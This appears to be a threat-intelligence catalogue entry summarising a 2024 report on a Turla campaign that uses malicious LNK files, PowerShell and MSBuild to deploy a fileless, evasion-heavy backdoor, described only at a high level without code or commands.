Turla: A Master of Deception
Essential information
- Published
- 08/07/2024 10:45
- Modified
- 08/07/2024 10:55
- Tags
- 2024-07-08 backdoor evasion fileless msbuild powershell snake uroburos
- Related entities
- 10 observables, 1 intrusion sets (apt), 7 techniques (mitre), 2 malware, 1 others
Description
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features, memory patching, and AMSI bypass. The malware establishes communication with its command and control servers and is capable of executing additional PowerShell scripts. The analysis also provides insights into the malware's capabilities, including its anti-detection mechanisms and ability to report information back to its operators.